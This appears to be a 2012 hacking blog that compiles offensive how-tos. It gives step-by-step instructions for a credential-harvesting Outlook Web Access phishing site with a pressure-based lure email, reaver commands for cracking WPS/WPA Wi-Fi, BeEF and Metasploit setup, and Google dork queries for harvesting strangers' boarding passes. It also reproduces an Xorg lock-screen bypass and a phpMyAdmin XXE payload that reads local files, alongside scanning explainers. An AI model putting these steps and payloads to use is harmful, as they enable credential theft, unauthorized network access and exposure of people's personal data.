Jan 20, 2012

Howto: Simple Outlook Web Access Phishing

This blog post describes a simple phishing attack covered in today's webcast. The goal is to create a fake front-end to an organization's Outlook Web Access portal and convince users to login through this portal. In the course of an authorized security assessment this type of attack provides an initial foot in the door to the target organization and takes few resources to setup.
This technique relies on the following steps:
  • Clone the target's existing OWA site to match graphics and versions
    • HTTrack or Firefox "Save page as"
  • Register a look-alike domain (mail.example.com -> mailexample.com)
    • Gandi.net even provides free SSL certificates as part of COM registration
    • IDN-style names can make this even harder to identify
  • Rewrite the OWA HTML to change the links/images
    • Point the form POST to the real OWA portal
  • Modify flogon.js to log prior to re-posting to the real OWA
The result is a site that looks like the original and acts like the original. A bad password takes the user to the real site with the expected error and a correct password takes them to the real site and logs them in. Microsoft could mitigate this by adding CSRF tokens to the form authentication template in OWA. This basic technique was used with both Exchange 2007 and Exchange 2010 OWA installations.
To convince users to access the mis-named site, I typically craft an email with a subject like "Welcome to Outlook Web Access" - pasting in a typical "enrollment" email, linking to the fake portal (with the displayed link pointing to the real portal).Telling the user that they have 24 hours to access the portal to keep their account active may help speed things along as well.
If you conduct this type of phishing attack for another organization, the friendly thing to do is transfer the domain to their IT staff after the conclusion of the test. At the least, it takes a potential phishing domain off a list that a real attacker could draw from.

If you like my blog, Please Donate Me

Bypass screensaver/locker program on xorg 1.11 and up

It's so surprise for me when I found this post. If you want to see full message, please go to the Source.

Hi, I recently stumbled upon a funny bug feature in the Xorg server that could allow attackers with physical access to a machine to bypass the screensaver/screen locker program. Most people use those programs to lock their computer when they are away. On Gnome, gnome-screensaver is responsible for this. On KDE, kscreenlocker is. There is a wide variety of smaller tools doing the same thing, e.g. slock, slimlock, i3lock...
A few years ago, a special keybinding was introduced to "kill" windows who grabbed mouse/keyboard, (mostly for testing/debug purposes ?). This functionality was disabled by default, well documented in the man page and an API was written for programs to disallow this behavior: 
Option "AllowClosedownGrabs" "boolean"
    This option enables the use of the Ctrl+Alt+Keypad-Multiply key sequence to kill clients with an active keyboard or mouse grab as well as killing any application that may have locked the server, normally using the XGrabServer(3x) Xlib function. Default: off.
    Note that the options AllowDeactivateGrabs and AllowClosedownGrabs will allow users to remove the grab used by screen saver/locker programs. An API was written to such cases. If you enable this option, make sure your screen saver/locker is updated.

This API allowing to disable the keybinding per application was removed in 2008 with the XFree86-Misc extension (commit here and here). Later, the whole AllowClosedownGrabs code was removed (commit) and all reference to it was expunged from the man page (commit). I never knew about those key bindings and I doubt they were widely used anyway.

The functionality seems to have been reintroduced in 2011 (commit here and mailing list message here), but this time it's enabled by default, not clearly documented and not even configurable easily (or maybe i haven't found the right way to do it ?). All distros shipping xorg 1.11 (e.g. Arch Linux, Debian Wheezy) are vulnerable to this. I can reproduce the bug on Debian(Gnome 3), Arch Linux with gnome 3, slock and slimlock. KDE is also vulnerable according to a friend.
Quick and dirty fix ? Edit your xkb configuration manually to remove all mentions of XF86Ungrab and XF86ClearGrab. You could also use vlock.

Source: http://gu1.aeroxteam.fr/2012/01/19/bypass-screensaver-locker-program-xorg-111-and-up/

If you like my blog, Please Donate Me

Jan 19, 2012

Howto: Crack WPS & WPA Wifi with reaver

1. Get the reaver
- wget https://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz

2. Extract and compile it.
- tar xzvf reaver-1.3.tar.gz
- cd reaver-1.3/src
- ./configure
- make
- make install

3. Change your wireless card to monitor mode
- airmon-ng start wlan0

4. Use reaver
- reaver -i mon0 -b <mac_address_wireless_access_point>

5. Waiting beacon from Wireless Access Point and finally you will found the key!!!


If you like my blog, Please Donate Me

Howto: Use BeEF with Metasploit4.2.0-dev

In the last month, Metasploit has replace xmlrpc with msgrpc and BeEF update new library to communicate with Metasploit. And this post is tutorial for use BeEF to work with Metasploitv4.2.0

** My OS is Backtrack 5 R1, Metasploit v4.2.0dev, beef-

1. Install the latest beef with
   - rm -rf /pentest/web/beef
   - git clone https://github.com/beefproject/be

   - Add export GEM_PATH=/var/lib/gems/1.9.2/gems && export GEM_HOME=/var/lib/gems/1.9.2/gems to /etc/profile
    - source /etc/profile
    - cd /pentest/web/beef

    - gem install bundler
    - bundle install
    - root@bt:~# irb
      irb(main):001:0> require 'rubygems'
      => false
      irb(main):002:0> require 'dm-core'
      => true
      irb(main):003:0> Gem.path
      => ["/var/lib/gems/1.9.2/gems"]
      irb(main):004:0> quit

2.  Edit /pentest/web/beef/config.yaml, in the last of file 

3. Edit /pentest/web/beef/extensions/metasploit/config.yaml, host and callback_host to your IP.

3. Create BeEF.rc to load msgplugin and configuration with
## In the BeEF.rc
load msgrpc ServerHost=yourIP Pass=abc123 ServerType=Web

4. Load the Metasploit with "-r BeEF.rc"
- msfconsole -r BeEF.rc

5.Load BeEF
- /pentest/web/beef/beef

If you like my blog, Please Donate Me

Jan 18, 2012

Howto: Banner Grabbing

If you want full detail, please go to the Source.

If you just type nmap on the console you will get a pretty detailed help with all the switched nmap can run. Lets first start with a ICMP Echo scan... -PE, we are adding -sn , which disables port scanning for now.

ICMP Echo Scans
So we scan our network and discover ourselves ( and another host We have to be wary of ICMP scans, and ICMP is generally quite restricted on networks, especially when scanning from outside the network. Let's see if we can do a TCP port scan to see what TCP ports are open on our potential victim. Let's go with the TCP Syn Scan (-sS).


So now we should figure out what versions those services are running if we can. This was we can research and determine if they are running exploitable versions.  So before I show you a way with nmap, I am going to quickly go to an old friend of mine, netcat. So netcat is a great tool which I highly recommend having in your arsenal, it can be used to scan for hosts, set up connections (valid and not so valid) between two machines, allows a remote shell to be shoveled to you from your victim, and even grabs banners for you :) If you want to do all this over a encrypted connection, well there is cryptcat.

Ok so lets do a banner grab for port 25, the SMTP mail service.


So the command is quite easy here... the '-v' stands for verbose (I am being EXTRA verbose, using double v's). Then I enter the IP and the port I am querying. As you can see, we found a Microsoft ESMTP MAIL service, Version 6.0.2600.5512, which according to wikipedia, is Exchange 2000. A quick google search takes me to a  Securiteam wepage, showing the exploits in Version 6 of ESMTP.

Lets see what wireshark says:

Wireshark Output of Netcat Banner Grab

So we see out three way handshake being established and then our potential victim responding with an SMTP packet and what version it is running. You can actually set this up so the version is not displayed, giving you a
little buffer protection from script kiddies. I should also point out that not every port will respond with things like this when you establish a connection, it is only certain protocols and software.

NetCat - Port 80
As you can see, we have a prompt waiting for input, so we type in 'GET HTTP', which should get us the information we are looking for.

NetCat - Querying Port 80

So this gives us our Web Server, IIS 5.1. Again, a quick google search reveals a few candidates we could try against this web server. This is looking promising!

Ok now onto something a tad more automated,nmap again has a switch for service detection (-sV). Lets run that on our host and see what it returns:

Nmap -sV parameter

Source: http://sketchymoose.blogspot.com/2012/01/banner-grabbing-whats-running.html

If you like my blog, Please Donate Me

Howto: Harvesting Boarding Pass with Google Dork

If you want the detail of boarding pass, please go to the Source.


"BOARDING PASS" "Please keep this document until the end of your trip" filetype:pdf

intitle:"Internet Check-In" filetype:pdf


(name OR nome) "etix" "Boarding Pass" filetype:pdf

boarding pass etix intitle:lufthansa intitle:pdf filetype:pdf

"easyJet.com Internet check-in boarding pass" filetype:pdf


Source: http://andreicostin.com/index.php/brain/2011/11/02/harvesting_boarding_passes

If you like my blog, Please Donate Me

Jan 16, 2012

Scanning Redux: TCP and UDP

So we wrap up the blog postings on scanning with TCP and UDP scans. Now again I stress that there are other types of scans out there, I just want to highlight some of them.

TCP stands for Transfer Control Protocol. This is the powerhouse of protocols, many applications ride this bad boy straight to your computer. Example-- this web page! Also your email clients and file transfer programs also use TCP. Why? Because TCP is reliable, it sets up a connection between two hosts... making sure both know what is going on (who is sending? who is receiving? did you receive that? Hey I received the packet, keep sending.. Oh fizzle sticks I never received this one packet, please resend! K, thx bai!) 

How does TCP do this? Well with the ever classic 3-way handshake. You can definitely check out the WIKI page for the official description. I liken the 3-way handshake to the best relationship ever, before speaking to his/her mate, the one partner will get the others attention (SYN), the other will then look at him/her to confirm they heard them (SYN-ACK), and then once he/she has their attention, will start to speak (ACK).

I am going to assume people understand TCP enough to go thru the scanning options, if not check out the documentation on there on the interwebs.I will post up from the SANS Cheat Sheet I talked about last post the TCP packet header. You can grab the whole cheat sheet here.

TCP Header

The Flag Byte of the TCP Header
TCP Syn Scan: This is when you start the 3 way handshake described earlier, except you never get past the 2nd step.  Nmap here shows the scanning machine sending a RST, cancelling the connection setup (else the port could be sitting there for while waiting for the ACK... what a waste!)

TCP Syn Scan - responded with a SYN-ACK, we have an open port!
Let's take a closer look at the flag bit...

Flag Bits of a TCP SYN Packet

So for those who count in binary we see this byte is 00000010, which is decimal 2. Cool, so when that bit is 'flipped' (or switched to '1') what does that mean? Looking at the SANS cheat sheet, we see that the 'SYN' bit is set to the 2nd bit... or 00000010. Wait, that's what it says! It must mean the SYN flag is on! Hoorah!

So riddle this Mr./Miss Smarty Pants, what would a SYN-ACK flag bit be set to? Well lets go back to the sheet- it says the ACK flag is set on the 5th bit. So if we flipped both SYN and ACK on, it would be 00010010, which is what in decimal? Whip out those calculators or pencils! The answer is 18 in decimal, ah but we are in hex mode here- which is the power of 16! Whaa this is getting complicated! Here go here for an example. Ok so dividing by 16 ::hours pass:: so that gets us the hex value of 0x12! And just to prove it, here is the flag byte of a SYN-ACK packet.

Flag Bits of a TCP SYN-ACK  packet

TCP Connect Scan: This is exactly what is sounds like, the full 3 way handshake is done to determine open ports. This scan is slower than the TCP Syn scan (this makes sense, sometimes you have wait ages to get your partner to listen and then start to speak!), and now you have a full connection, it has a better chance of being logged somewhere on the victim network. Not good if you are going for stealth. However, if you are being hampered by firewalls, this could be the way to go, as many devices could be between you and your intended victim, hampering your results.

TCP Christmas Scan: Sounds festive right? This scan flips the FIN, PUSH, and URG flags ("lighting up like a Christmas tree").This is effective against Linux hosts but not Windows machines (remember how I said different OS respond to packets differently?) This is going off RFC 793, Page 65:
if the [destination] port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.
 So these are a bit sneaky and can evade some firewalls and routers, but like I said, with Linux boxes only. Microsoft by default responds to these types of packets with a 'RST ACK' regardless of if its open or not.This is seen below, using the two hosts we used in the above example.

It was open on the other scan.... Bah humbug!

UDP is User Datagram Protocol. This is a connectionless protocol. Its like an assault on a port. There is no connection set up like TCP, and it doesn't care too much if some packets get dropped along the way. However, if you stream anything across the internets (like I am right now with internet radio), chances are pretty good you are using UDP.  DNS also uses UDP for name resolution, and DHCP is over UDP as well. Because there is no error checking or connection set up, packets move faster and sent to multiple hosts in a quicker fashion. Rock on UDP! 

UDP Scan: So as we said before there are many services that use UDP, such as DNS (which is a pretty juicy target!) This scan shows UDP port 124  responding back to our scanner with an ICMP unreachable sign, indicating the port is closed.

Sorry, we are closed!

This is what my nmap output is for that scan, and it is what is should be, port 124 is closed:

nmap result from nmap -sU scan

As people posted in the comments, there are tons of tools out there you can use. Nmap is just one of many. The key is to find the one you like and trust. Nping, which someone mentioned earlier, allows for much more fine tuning of your packets that you send out. p0f does
passive host identification. All these other scans I have shown are active-- we are interacting in some way with the intended target. p0f simply listens to network traffic and based on the traffic it sees regarding the target determines the OS, which is the stealthiest you can get, as you are simply observing (well there is always a catch, still its pretty slick). And like Jon said... a new version is coming out!

I did not talk about the multiple states that nmap can report back to the user, a good explanation is here on their website. Heck, I recommend the whole reference guide.

Next we get onto the fingerprinting/version detection... well I may post my powershell script first. That will probably go on Pastebin. Like I said its no where near perfect and always looking for more ways to make scripting better, faster, and more kick ass (because lets face it... we are lazy and want something else to do the grunt work)

Source: http://sketchymoose.blogspot.com/2012/01/scanning-redux-tcp-and-udp.html

If you like my blog, Please Donate Me

CVE-2011-4107 PoC - phpMyAdmin Local File Inclusion via XXE injection

An interesting local file inclusion vulnerability has been recently published. An XXE (XML eXternal Entity) injection attack, which affects phpMyAdmin 3.4.x previous to and 3.3.x previous to - CVE-2011-4107
The issue is located in the libraries\import\xml.php file, where the simplexml_load_string() function is called without validating the existence of a reference to an external entity on the file:
$xml = simplexml_load_string($buffer, “SimpleXMLElement”, LIBXML_COMPACT);
Patched versions make use of the libxml_disable_entity_loader() PHP function before loading the XML document, in order to prevent the injection. libxml_disable_entity_loader() function disables the ability to load external entities.
phpMyAdmin offers the functionality of importing a database from a user-specified XML file. In vulnerable versions importing a specially-crafted XML file which contains an external XML entity permits an authenticated attacker to retrieve a local file from the server or network (limited by the privileges of the user running the web server).
It is well understood that the LOAD_FILE MySQL function could be used to gain read access to files in the database file system, however there are configurations where phpMyAdmin is installed on a different host than the database and therefore exploitation of this issue could become handy in penetration testing engagements.
SECFORCE has developed a metasploit module to assist the exploitation of this vulnerability. It is available for download from our security tools section on our website.
This module automates the process of local file inclusion in the following way:
  1. Logging in into phpMyAdmin using provided credentials.
  2. Crafting an XML using XXE with the given file to read.
  3. Uploading the XML
  4. Retrieving the file from the server or network (restricted by the privileges of the user running the web server ).
The module has the options shown in the following screenshot:

An example of a successful run of the module is presented in the screenshot below:
Example of a successful file read
Example of successfully reading a file

Defining XML external entity (XXE) injection attack as part of XML injection vulnerability:
XML injection
XML Injection is when is is possible to change the values of an XML document and the XML parser fails to make an appropriate data validation this way making the injection possible.
XML external entity injection attack (XXE)
“External Entity: The set of valid entities can be extended by defining new entities. If the definition of an entity is a URI, the entity is called an external entity. Unless configured to do otherwise, external entities force the XML parser to access the resource specified by the URI, e.g., a file on the local machine or on a remote systems. This behavior exposes the application to XML eXternal Entity (XXE) attacks, which can be used to perform denial of service of the local system, gain unauthorized access to files on the local machine, scan remote machines, and perform denial of service of remote systems.” - (OWASP-DV-008)

XXE Example:
 <?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///c:/boot.ini" >]><foo>&xxe;</foo>
phpMyAdmin has released patched versions available for download from here.

Source: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/

If you like my blog, Please Donate Me